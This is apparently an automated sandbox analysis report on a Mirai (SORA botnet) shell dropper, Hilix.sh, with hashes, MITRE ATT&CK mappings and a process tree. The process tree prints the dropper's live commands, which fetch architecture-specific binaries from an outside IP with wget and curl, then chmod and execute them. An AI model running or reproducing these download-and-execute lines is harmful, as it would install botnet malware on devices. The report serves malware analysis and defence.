mirai | b88af3d8497698f899f6fe58f5a1d0e19143dffeb70656c018bb66e3ebb58581

Analysis

max time kernel
149s
max time network
122s
platform
debian-9_armhf
resource
debian9-armhf-20240611-en
resource tags

arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
17-02-2025 14:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Hilix.sh
Size

1KB
MD5

3090c143255a23405cfb7352fc616487
SHA1

823690d5f6f37ed7445e315462fb580ade61f736
SHA256

b88af3d8497698f899f6fe58f5a1d0e19143dffeb70656c018bb66e3ebb58581
SHA512

519e65e8c66381931606ea8a0033a828673a3b5483b72bd94037f309990482d834a8a75a2fbb06f72ff94c4135568b59ac709f64a66d10ae0aadbb8e3627ecc6

Score

10^/10

mirai sora antivm botnet defense_evasion discovery

Malware Config

Extracted

Family

mirai

Botnet

SORA

Extracted

Family

mirai

Botnet

SORA

Extracted

Family

mirai

Botnet

SORA

Signatures

Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Mirai family
mirai

File and Directory Permissions Modification 1 TTPs 6 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
681	chmod
762	chmod
770	chmod
776	chmod
781	chmod
795	chmod

Executes dropped EXE 6 IoCs

ioc	pid	Process
/tmp/SSH	682	Hilix.sh
/tmp/SSH	763	Hilix.sh
/tmp/SSH	771	Hilix.sh
/tmp/SSH	777	Hilix.sh
/tmp/SSH	782	Hilix.sh
/tmp/SSH	796	Hilix.sh

Checks CPU configuration 1 TTPs 6 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

T1497.001

description	ioc	Process
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl

Reads runtime system information 12 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

System Network Configuration Discovery 1 TTPs 4 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
684	wget
695	curl
761	cat
763	SSH

Writes file to tmp directory 13 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/Hilix.x86	curl
File opened for modification	/tmp/SSH	Hilix.sh
File opened for modification	/tmp/Hilix.mpsl	curl
File opened for modification	/tmp/Hilix.arm5	wget
File opened for modification	/tmp/Hilix.arm6	wget
File opened for modification	/tmp/Hilix.arm6	curl
File opened for modification	/tmp/Hilix.arm7	wget
File opened for modification	/tmp/Hilix.x86	wget
File opened for modification	/tmp/Hilix.mips	curl
File opened for modification	/tmp/Hilix.mpsl	wget
File opened for modification	/tmp/Hilix.arm4	curl
File opened for modification	/tmp/Hilix.arm5	curl
File opened for modification	/tmp/Hilix.mips	wget

/tmp/Hilix.sh
/tmp/Hilix.sh
1⤵
- Executes dropped EXE
- Writes file to tmp directory
PID:649
- /usr/bin/wget
  wget http://37.221.67.207/bins/Hilix.x86
  2⤵
  - Writes file to tmp directory
  PID:652
- /usr/bin/curl
  curl -O http://37.221.67.207/bins/Hilix.x86
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:670
- /bin/cat
  cat Hilix.x86
  2⤵
  PID:680
- /bin/chmod
  chmod +x Hilix.sh Hilix.x86 SSH systemd-private-4bb0ea38cd41432f851bb896ecd952d2-systemd-timedated.service-cTh2DD
  2⤵
  - File and Directory Permissions Modification
  PID:681
- /tmp/SSH
  ./SSH Hilix.x86
  2⤵
  PID:682
- /usr/bin/wget
  wget http://37.221.67.207/bins/Hilix.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:684
- /usr/bin/curl
  curl -O http://37.221.67.207/bins/Hilix.mips
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:695
- /bin/cat
  cat Hilix.mips
  2⤵
  - System Network Configuration Discovery
  PID:761
- /bin/chmod
  chmod +x Hilix.mips Hilix.sh Hilix.x86 SSH systemd-private-4bb0ea38cd41432f851bb896ecd952d2-systemd-timedated.service-cTh2DD
  2⤵
  - File and Directory Permissions Modification
  PID:762
- /tmp/SSH
  ./SSH Hilix.mips
  2⤵
  - System Network Configuration Discovery
  PID:763
- /usr/bin/wget
  wget http://37.221.67.207/bins/Hilix.mpsl
  2⤵
  - Writes file to tmp directory
  PID:765
- /usr/bin/curl
  curl -O http://37.221.67.207/bins/Hilix.mpsl
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:767
- /bin/cat
  cat Hilix.mpsl
  2⤵
  PID:769
- /bin/chmod
  chmod +x Hilix.mips Hilix.mpsl Hilix.sh Hilix.x86 SSH systemd-private-4bb0ea38cd41432f851bb896ecd952d2-systemd-timedated.service-cTh2DD
  2⤵
  - File and Directory Permissions Modification
  PID:770
- /tmp/SSH
  ./SSH Hilix.mpsl
  2⤵
  PID:771
- /usr/bin/wget
  wget http://37.221.67.207/bins/Hilix.arm4
  2⤵
  PID:773
- /usr/bin/curl
  curl -O http://37.221.67.207/bins/Hilix.arm4
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:774
- /bin/cat
  cat Hilix.arm4
  2⤵
  PID:775
- /bin/chmod
  chmod +x Hilix.arm4 Hilix.mips Hilix.mpsl Hilix.sh Hilix.x86 SSH systemd-private-4bb0ea38cd41432f851bb896ecd952d2-systemd-timedated.service-cTh2DD
  2⤵
  - File and Directory Permissions Modification
  PID:776
- /tmp/SSH
  ./SSH Hilix.arm4
  2⤵
  PID:777
- /usr/bin/wget
  wget http://37.221.67.207/bins/Hilix.arm5
  2⤵
  - Writes file to tmp directory
  PID:778
- /usr/bin/curl
  curl -O http://37.221.67.207/bins/Hilix.arm5
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:779
- /bin/cat
  cat Hilix.arm5
  2⤵
  PID:780
- /bin/chmod
  chmod +x Hilix.arm4 Hilix.arm5 Hilix.mips Hilix.mpsl Hilix.sh Hilix.x86 SSH systemd-private-4bb0ea38cd41432f851bb896ecd952d2-systemd-timedated.service-cTh2DD
  2⤵
  - File and Directory Permissions Modification
  PID:781
- /tmp/SSH
  ./SSH Hilix.arm5
  2⤵
  PID:782
- /usr/bin/wget
  wget http://37.221.67.207/bins/Hilix.arm6
  2⤵
  - Writes file to tmp directory
  PID:783
- /usr/bin/curl
  curl -O http://37.221.67.207/bins/Hilix.arm6
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:784
- /bin/cat
  cat Hilix.arm6
  2⤵
  PID:794
- /bin/chmod
  chmod +x Hilix.arm4 Hilix.arm5 Hilix.arm6 Hilix.mips Hilix.mpsl Hilix.sh Hilix.x86 SSH
  2⤵
  - File and Directory Permissions Modification
  PID:795
- /tmp/SSH
  ./SSH Hilix.arm6
  2⤵
  PID:796
- /usr/bin/wget
  wget http://37.221.67.207/bins/Hilix.arm7
  2⤵
  - Writes file to tmp directory
  PID:797

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Credential Access

Discovery

System Network Configuration Discovery

T1016

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/SSH

Filesize
52KB

MD5
0dbb0bae0054d916eafeada37fc7b819

SHA1
e7670a20ce0edf5c5ff38bae473995880e6757fc

SHA256
8e57192985c90a59e2e0056d28ac3d279e072afa3014626b11089b68bc3fb4a7

SHA512
70605d8ddcf4737724d4a90c1fda95eed38ea2ef02bec972c441345bea64525283cf05ddd63873da9137ab0d4ff7f7d233e13f2ee476728c821c4ea5d67433b9

Download Submit
/tmp/SSH

Filesize
75KB

MD5
c5ac66527e3fd9e5c9c55163f889929c

SHA1
f08d582d98bbe284f891e4a56b0f84e1e0b8cf45

SHA256
24837881c5f0661e5f248f5d7b6e4f92b48f1ca54cd267855a78d7335adf8cb5

SHA512
edd2ac9809fb84325122d2d30b7979190bfb19d6fb8980075ba7d6652509ba3e5b6859fb72119aed263bde4017621408dc3fad4cae1af95db93249da6684f558

Download Submit
/tmp/SSH

Filesize
78KB

MD5
2b9e19987cb1a7cdcc422708ff5ded31

SHA1
8b4c8374f2e0cb8b9551096464c92cf125720788

SHA256
6b708c04f7bfa45d586b4466fa0bc29b95c5f793ed610adcbc67fb1f9526dbe6

SHA512
8759c14e95e970f57856c3be6a517cf00c344ed08833b7200ab96b44968716d63b4393e8b3bfe77278705f74a0a2f00be1629837e1a28550b668fb1a2e90fff6

Download Submit
/tmp/SSH

Filesize
213B

MD5
f87005f796675cc42d01d2c2a0980019

SHA1
f86803abb6a20f74faa7d9a5cef4ad4ff35ed7cf

SHA256
3da99f8ed6b2499f723f7222634c922c77db0be580762fe1ef49a6933e5dfe7c

SHA512
2efd306ad26cdc3d521a203482ab104696fa681663e8268fd8b735e53daac7da3a37087bc3fae814c6e341c805e56aff9a0ebdc9c392546f0d23b916c07a8770

Download Submit
/tmp/SSH

Filesize
51KB

MD5
c3693707374ea5402fa5f138eb86a92d

SHA1
5cde2e8bf859ea7094880adf9e642963aba6c418

SHA256
a4e1d173606ea5c90fb4feb0a5bd3cfc9768f87e107a677e8e3b46b6303f38ec

SHA512
803df1fc82ae40a54c2ebaf2cb14311aabeb7de1071d379a9bb142a70fd39dcf54fe495871f3282e318322e45aad38416210a3ba1bd3be033b5775deac55693d

Download Submit
/tmp/SSH

Filesize
69KB

MD5
003d98ce07f7c868e76d3fb46896aceb

SHA1
b6e36f7eacc7722c5feec1d42703272a1629e72a

SHA256
570b61c651bb5030a93191aef05f5221996627b7768ea988b655fdf6c7a135f9

SHA512
9e756014bfc5ae3f69a752342411be8e532b0641e26409fa8a4f0f49d4bc2f7aa844bb9309ea5ca74dc477d1fdd85603f30bfc83aa85e3aff5311f08131c98c2

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads